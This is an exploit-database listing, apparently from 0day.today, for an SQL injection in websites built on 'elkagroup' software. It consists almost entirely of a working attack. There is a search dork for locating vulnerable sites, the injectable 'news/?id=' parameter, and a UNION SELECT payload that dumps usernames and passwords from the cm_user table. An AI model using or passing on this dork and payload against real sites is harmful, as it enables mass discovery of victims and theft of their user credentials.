[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

elkagroup SQL Injection Vulnerability

Author
SadHaCkEr
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10112
Category
web applications
Date add
06-12-2009
Platform
unsorted
=====================================
elkagroup SQL Injection Vulnerability
=====================================


#Dork : "powered by: elkagroup"
[!] Exp:
[!]  http://server/news/?id=[SQL]                                                                                               
[!]
[!]    [SQL] :                                                                                                                              
[!]     UNION SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(username,char(58),password),12,13,14,15,16,17,18,19,20,21,22,23 FROM+cm_user--                                                                        

              

#  0day.today [2024-11-16]  #